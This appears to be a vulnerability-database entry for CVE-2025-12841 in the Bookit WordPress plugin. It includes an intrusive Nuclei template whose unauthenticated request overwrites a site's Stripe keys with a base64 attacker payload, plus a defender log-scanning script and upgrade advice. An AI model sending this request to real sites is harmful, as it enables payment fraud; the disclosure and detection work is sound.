
WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update

CVE-2025-12841
Verified

Description

Bookit WordPress plugin < 2.5.1 contains a broken access control vulnerability caused by a publicly accessible REST endpoint allowing unauthenticated update of Stripe payment options, letting remote attackers modify payment settings without authentication.

Severity

High

CVSS Score

8.2

Exploit Probability

1%

Published Date

May 19, 2026

Template Author

0x_akoko

CVE-2025-12841.yaml
id: CVE-2025-12841

info:
  name: WordPress Bookit < 2.5.1 - Unauthenticated Stripe Settings Update
  author: 0x_Akoko
  severity: high
  description: |
    Bookit WordPress plugin < 2.5.1 contains a broken access control vulnerability caused by a publicly accessible REST endpoint allowing unauthenticated update of Stripe payment options, letting remote attackers modify payment settings without authentication.
  impact: |
    Remote attackers can modify Stripe payment options without authentication, potentially leading to financial fraud or service disruption.
  remediation: |
    Upgrade to version 2.5.1 or later.
  reference:
    - https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-12841
    - https://wordpress.org/plugins/bookit/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L
    cvss-score: 8.2
    cve-id: CVE-2025-12841
    epss-score: 0.01129
    epss-percentile: 0.78804
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/bookit/"
  tags: cve,cve2025,wp,wp-plugin,wordpress,bookit,stripe,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/bookit/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "bookit")'
          - 'compare_versions(version, "< 2.5.1")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\w.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/bookit/v1/commerce/stripe/return?stripe=eyJzdHJpcGVfdXNlcl9pZCI6IkFDQ1RfSEFDS0VSIiwibGl2ZSI6eyJhY2Nlc3NfdG9rZW4iOiJza19saXZlX2hhY2tlciJ9LCJzYW5kYm94Ijp7ImFjY2Vzc190b2tlbiI6InNrX3Rlc3RfaGFja2VyIn0sImNsaWVudF9pZCI6ImNhX2hhY2tlciIsInB1Ymxpc2hhYmxlX2tleSI6InBrX2xpdmVfaGFja2VyIiwiY2xpZW50X3NlY3JldCI6InNrX2xpdmVfaGFja2VyIn0= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_all(to_lower(header), "bookit-settings", "x-redirect-by")'
        condition: and
# digest: 4a0a00473045022100c37f77f3f4fedc65e0d913636c293ceb181e1785c9e69e54f056dda9555f130b022026a2274187a0aa73ebb76ec8ecd523703831e7496eaeb7422605c9c0031938dd:922c64590222798bb761d5b6d8e72950
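Defender-side companion to the template above, added here as an example and not part of the vulnerability entry or the Bookit plugin: it scans web-server access logs for hits on the Stripe return endpoint and decodes the ?stripe= parameter so an analyst can see which Stripe settings a request tried to overwrite. It assumes combined log format and that the parameter carries the base64-encoded JSON object the template's request uses; the log lines and payload below are constructed.

```python
import base64
import json
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint exercised by the template above; its ?stripe= parameter carries a
# base64-encoded JSON object with the Stripe options the plugin writes back.
BOOKIT_RETURN_PATH = "/wp-json/bookit/v1/commerce/stripe/return"

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_stripe_param(value):
    """Decode the base64 JSON blob; returns (dict, None) or (None, reason)."""
    value = value.replace(" ", "+")       # parse_qs turned '+' into spaces
    value += "=" * (-len(value) % 4)      # restore padding a logger may strip
    try:
        data = json.loads(base64.b64decode(value))
    except ValueError as exc:             # covers binascii.Error, JSONDecodeError
        return None, f"undecodable payload: {type(exc).__name__}"
    return (data, None) if isinstance(data, dict) else (None, "not a JSON object")

def scan_access_log(text):
    """One finding per request to the Stripe return endpoint, whoever sent it."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.rstrip("/") != BOOKIT_RETURN_PATH:
            continue
        stripe = parse_qs(url.query).get("stripe")
        data, err = decode_stripe_param(stripe[0]) if stripe else (None, "no stripe parameter")
        findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "fields": sorted(data) if data else [], "error": err})
    return findings

# Constructed sample log, not from a real host. Line 2 mirrors the template's
# request with an example payload; line 3 carries a blob that is not JSON.
EXAMPLE_PAYLOAD = base64.b64encode(json.dumps({
    "stripe_user_id": "ACCT_EXAMPLE", "live": {"access_token": "sk_live_EXAMPLE"},
    "client_secret": "sk_live_EXAMPLE"}).encode()).decode()
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [19/May/2026:10:01:02 +0000] "GET /wp-content/plugins/bookit/readme.txt HTTP/1.1" 200 4120 "-" "curl/8.0"',
    f'203.0.113.7 - - [19/May/2026:10:01:03 +0000] "GET {BOOKIT_RETURN_PATH}?stripe={EXAMPLE_PAYLOAD} HTTP/1.1" 302 0 "-" "curl/8.0"',
    f'198.51.100.4 - - [19/May/2026:10:05:00 +0000] "GET {BOOKIT_RETURN_PATH}?stripe=bm90LWpzb24= HTTP/1.1" 302 0 "-" "curl/8.0"',
])
```

Every hit on this endpoint is worth a ticket on an unpatched site, since the legitimate Stripe Connect return flow is rare and administrator-initiated; a 302 carrying Stripe key fields from an unfamiliar client IP is the pattern to alert on.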
CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L
CVE ID:
CVE-2025-12841
CWE ID:
CWE-862

References

https://wpscan.com/vulnerability/60cb3d5f-1aa5-4858-ab84-07fe7c023fdd/
https://nvd.nist.gov/vuln/detail/CVE-2025-12841
https://wordpress.org/plugins/bookit/

Remediation Steps

Upgrade to version 2.5.1 or later.